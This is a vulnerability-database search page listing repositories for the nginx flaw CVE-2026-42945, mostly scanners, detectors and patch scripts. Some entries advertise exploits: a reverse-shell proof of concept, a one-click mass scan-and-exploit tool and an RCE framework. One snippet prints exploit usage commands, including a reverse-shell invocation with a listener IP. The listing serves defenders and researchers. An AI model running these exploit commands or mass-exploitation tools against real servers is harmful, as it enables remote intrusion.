Lucene search
+L

101 matches found

Kitploit
Kitploit
added 2026/09/07 5:04 a.m.4 views

CVE-2026-42945-Reverse-Shell-POC

CVE-2026-42945 NGINX Rift PoC de RCE con Reverse Shell Prueba de concepto de ejecución remota de código para CVE-2026-42945 , un desbordamiento de búfer en el heap del módulo ngxhttprewritemodule de NGINX. Este fork extiende el PoC público de activación con un listener de reverse shell integrado ...

9.2CVSS8.2AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/07 4:40 a.m.4 views

nginx-rift-detect

nginx-rift-detect Script de detección por comportamiento para CVE-2026-42945 NGINX Rift — un desbordamiento de búfer en el montón en ngxhttprewritemodule presente en nginx desde 2008. ⚠️ Descargo de responsabilidad Esta herramienta está destinada exclusivamente a pruebas de seguridad e...

9.2CVSS8AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/07 4:06 a.m.4 views

Nginx_cve-2026-42945-scanner-gui

Ngxin cve-2026-42945-scanner-gui Necesita ejecutar jdk21version java -jar cve-2026-42945-scanner.... Escaneo masivo + explotación de vulnerabilidades con un clic Necesita jdk21 para ejecutarse Después de descomprimir, ejecuta java -jar cve-2026-42945-scanner.... Escaneo masivo + explotación de...

9.2CVSS7.7AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/07 2:21 a.m.4 views

NGINX-Rift

NGINX Rift — Herramienta de escaneo y verificación de vulnerabilidades CVE-2026-42945 / CVE-2026-9256 NGINX Rift es una herramienta de código abierto de escaneo y verificación para CVE-2026-42945 y CVE-2026-9256 vulnerabilidades de desbordamiento de montón en el módulo ngxhttprewritemodule de...

9.2CVSS7.8AI score0.68047EPSS
SaveExploits46
Kitploit
Kitploit
added 2026/09/07 1:01 a.m.5 views

Scanner_CVE_2026-42945

Escáner para detección de instancias Nginx vulnerables al CVE-2026-42945 NGINX RIFT. Acepta IPs individuales, rangos CIDR y ASNs como entrada. Acerca de El CVE-2026-42945 afecta a todas las versiones de Nginx anteriores a la 1.30.1. La herramienta sondea HTTP y HTTPS en los puertos predeterminado...

9.2CVSS7.8AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/06 11:44 p.m.6 views

nGixshell

nGixShell es un escáner de CVE de nginx y un framework de explotación RCE. Incluye una prueba de concepto funcional para CVE-2026-42945 — un desbordamiento crítico de heap buffer en ngxhttprewritemodule — y un escáner que cubre 53 CVEs de nginx con sondas HTTP automatizadas, huella digital,...

9.2CVSS7.8AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/06 8:58 p.m.2 views

NGINX_RIFT_SCAN_CVE_2026_42945

NGINX Rift Config Scanner Language: 中文 | English This is a lightweight scanner for checking whether an NGINX configuration contains risky CVE-2026-42945, also known as NGINX Rift, and CVE-2026-9256 configuration patterns. The issue was disclosed by depthfirst in NGINX Rift: Achieving NGINX RCE vi...

9.2CVSS7.6AI score0.68047EPSS
SaveExploits42References1
Kitploit
Kitploit
added 2026/09/06 9:51 a.m.6 views

ai-vuln-rediscovery-nginx-cve-2026-42945

Redescubrimiento asistido por IA de CVE-2026-42945 en nginx Este repositorio documenta un experimento reproducible de redescubrimiento de vulnerabilidad asistido por IA contra el módulo ngxhttprewritemodule de nginx, posteriormente asociado con CVE-2026-42945. El experimento es intencionalmente...

9.2CVSS7.8AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/05 5:34 p.m.7 views

CVE-2026-42945-NGINX-Rift-Check-Script

Este repositorio no tiene un README...

9.2CVSS7.6AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/05 4:43 p.m.4 views

nginx-rift-scanner

nginx-rift-scanner Dependency-free Python 3 scanner for CVE-2026-42945 "NGINX Rift" — a CVSS v4.0 9.2 CRITICAL heap-based buffer overflow CWE-122 in ngxhttprewritemodule. What it detects Two independent checks are run on every invocation:...

9.2CVSS7.7AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/05 4:12 p.m.5 views

cve-2026-42945-scan

cve-2026-42945-scan Static scanner for NGINX configuration files that detects the rewrite/set pattern associated with CVE-2026-42945. The scanner parses NGINX configs with crossplane, walks location blocks, and prints every location that looks affected in this format: root@kitploit: //xxx.conf: -...

9.2CVSS7.8AI score0.68047EPSS
SaveExploits42References2
Kitploit
Kitploit
added 2026/09/04 5:23 p.m.4 views

nginx-rift-check

nginx-rift-check Encuentra configuraciones vulnerables a CVE-2026-42945 , el desbordamiento de búfer en el heap del ngxhttprewritemodule de nginx. Ejecutar una versión afectada de nginx de 0.6.27 a 1.30.0 no es suficiente para ser explotable. La configuración debe contener un par específico de...

9.2CVSS7.9AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/04 11:45 a.m.5 views

CVE-2026-42945-NGINX-Rift

CVE-2026-42945-NGINX-Rift root@kitploit: Basic usage with target IP python3 exploit.py --target-ip 192.168.1.100 --cmd "id" With custom port python3 exploit.py --target-ip 192.168.1.100 --port 8080 --cmd "id" Reverse shell python3 exploit.py --target-ip 192.168.1.100 --shell --listen-ip 10.0.0.1...

9.2CVSS7.7AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/03 1:10 p.m.6 views

nginx-rift-detector

CVE-2026-42945 के लिए NGINX Rift डिटेक्टर स्वामित्व वाले NGINX सर्वरों के लिए केवल-पढ़ने योग्य Bash जाँचकर्ता। यह CVE-2026-42945 के खुलासे के बाद एक ऑपरेटर को दो सवालों का जवाब देने में मदद करता है: क्या यह सर्वर अभी भी एक exposed NGINX build या जोखिम भरा rewrite कॉन्फ़िगरेशन चला रहा है? क्या...

9.2CVSS7.8AI score0.68047EPSS
SaveExploits42References2
Kitploit
Kitploit
added 2026/09/03 6:58 a.m.4 views

fix_nginx_cve_2026_42945

Script de reparación de un clic para NGINX CVE-2026-42945 Detecta automáticamente la distribución del sistema, actualiza NGINX a la versión corregida ≥1.30.1, respalda la configuración y revierte automáticamente en caso de fallo. Descripción de la vulnerabilidad ID de vulnerabilidad: CVE-2026-429...

9.2CVSS7.7AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/02 10:17 p.m.3 views

CVE-2026-42945-nginx-rift

Este repositorio no tiene un README...

9.2CVSS7.6AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/02 10:13 p.m.4 views

CVE-2026-42945

Este repositorio no tiene un README...

9.2CVSS7.6AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/02 10:11 p.m.4 views

CVE-2026-42945

CVE-2026-42945 PoC Go 中文 | English A detection and exploitation helper for nginx HTTP/2 CVE-2026-42945. Use it only in authorized environments to verify vulnerability presence, compare patched vs. vulnerable behavior, and reproduce PoC logic in a controlled lab. Affected versions heuristic: nginx...

9.2CVSS7.7AI score0.68047EPSS
SaveExploits42References1
Kitploit
Kitploit
added 2026/09/02 1:23 p.m.6 views

nginx-cve-2026-42945

CVE-2026-42945 NGINX Rift — escáner defensivo Las organizaciones que ejecutan NGINX Open Source , NGINX Plus o ingress/controladores basados en NGINX deberían verificar si están afectadas por CVE-2026-42945 y aplicar el parche o reconfigurar antes de que los intentos de explotación lleguen a los...

9.2CVSS7.8AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/08/31 7:50 a.m.7 views

nginx-rce-cve-2026-42945

5. CVE-2026-42945 - ثغرة تنفيذ أوامر حرجة في NGINX CVSS 9.2 التصنيف الفئة: 0-Day / تنفيذ أوامر عن بُعد CVE: CVE-2026-42945 CVSS: 9.2 حرجة تاريخ الاكتشاف: 12 مايو 2026 تاريخ التصحيح: مايو 2026 الإصدار الأمني الربعي لـ F5 المصدر: GitHub DepthFirstDisclosures/Nginx-Rift تفاصيل الثغرة تجاوز سعة المخز...

9.2CVSS7.9AI score0.68047EPSS
SaveExploits42
Rows per page
Query Builder